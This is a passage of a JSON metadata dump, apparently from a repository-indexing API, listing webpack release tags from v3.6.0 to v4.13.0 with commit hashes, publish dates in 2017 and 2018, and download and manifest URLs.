","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0"